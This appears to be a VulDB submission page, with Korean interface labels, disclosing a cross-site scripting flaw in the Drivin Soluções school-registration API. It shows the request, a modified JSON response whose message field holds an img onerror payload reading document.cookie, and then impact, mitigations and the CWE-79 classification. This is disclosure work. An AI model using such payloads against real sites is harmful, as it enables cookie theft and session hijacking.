제출 #509834: Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation정보

제목	Drivin Drivin Soluções NA Cross-Site Scripting via API Response Manipulation
설명	Vendor: Drivin Product: Drivin Soluções A Cross-Site Scripting (XSS) vulnerability was identified in the Drivin Soluções platform. The issue arises from improper handling of API responses, where user-controlled input is reflected directly in the front-end without proper sanitization. Request: POST /api/school/registerSchool HTTP/2 Host: X.X.X.X Content-Type: application/json {"name":"bilubiluteteia","code":"123","cnpj":"12.321.321/3213-21","email":"[email protected]","phone":"(12) 3 1231-2312","zipCode":"18053-362","city":"Sorocaba","street":"Rua Almir Muza Soares","district":"Jardim Santa Bárbara","number":"123123","complement":"","state":"SP"} Response: HTTP/2 400 Bad Request Content-Type: application/json {"message":"Escola ja cadastrada!","error":"Escola ja cadastrada!","statusCode":400} POC ---------------- By intercepting the API response and modifying the `message` field, an attacker can inject JavaScript that will execute on the client-side when processed by the front-end. Malicius Request: HTTP/2 400 Bad Request Content-Type: application/json {"message":"<img src onerror=alert(document.cookie)>","error":"Escola ja cadastrada!","statusCode":400} When this response is rendered on the webpage, the JavaScript within the `message` field executes, leading to an XSS attack. Impact: - Theft of authentication cookies and session hijacking. - Potential redirection to malicious websites. - Defacement or unauthorized actions performed on behalf of the victim. Mitigation: - Implement proper output encoding before displaying any user-supplied data. - Use Content Security Policy (CSP) to restrict script execution. - Sanitize API responses before rendering them in the front-end. Classification: - Type: Reflected XSS via API Response Manipulation - CWE: CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
원천	⚠️ https://github.com/yago3008/cves
사용자	y4g0 (UID 80480)
제출	2025. 02. 26. PM 07:52 (1 년도 ago)
모더레이션	2025. 03. 15. AM 10:27 (17 days later)
상태	수락
VulDB 항목	299800 [Drivin Soluções 까지 20250226 API registerSchool 메시지 크로스 사이트 스크립팅]
포인트들	20

◂ 이전 개요 다음 ▸

Want to know what is going to be exploited?

We predict KEV entries!